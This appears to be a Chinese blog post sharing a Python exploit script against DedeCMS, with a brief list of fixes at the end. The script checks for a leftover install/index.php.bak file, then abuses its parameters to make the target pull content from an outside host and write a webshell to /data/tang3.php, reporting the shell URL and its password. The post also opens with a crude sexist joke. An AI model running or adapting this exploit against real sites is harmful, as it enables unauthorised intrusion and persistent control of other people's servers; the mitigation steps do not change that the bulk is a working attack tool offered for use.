织梦dedecms最新远程代码执行利用脚本（python）

织梦CMS漏洞，就好比女人的大姨妈，每个月不来上一次，这就算是内分泌失调。代码是用python写的，小伙伴们自行调试吧！在前段时间，织梦爆出了一个远程文件包含漏洞。呃，感谢hoseph同学提供的代码吧。写的很不错！修复此漏洞方法，请见文章底部。

#! /usr/bin/env python

#coding=utf-8

#Joseph(小续)

import requests

import sys

import re

def main():

    try:

        url="http://"+sys.argv[1].strip('http://')

    except IndexError:

        print '''

        poc: dede.py [url]http://www.baidu.com/[/url]

        '''

    payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"

    urlpoc=url+payload

    code=requests.get(urlpoc).status_code

    if code==200:

        print u"恭喜存在此漏洞"

        print u"Ongoing attacks--->>>>>"

        exploit(url)

        pass

    else:

        print u"sorry 漏洞正在挣扎"

        pass

def exploit(url):

    urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"

    htmlcontent=requests.get(urlpoc).content

    Probe=re.compile(r'存在')

    if Probe.findall(htmlcontent):

        print u'''

        ver:getshell成功

        shell:url+/data/tang3.php?a=0  密码为：c

        '''

        pass

    else:

        print u"请看远程地址是否已经不可用"

        pass

if __name__ == '__main__':

    main()

修复方法：

1、建议安装完成后，删除（改名）install文件夹。

2、给data文件夹改名，或者移动位置。

3、到织梦后台，升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢！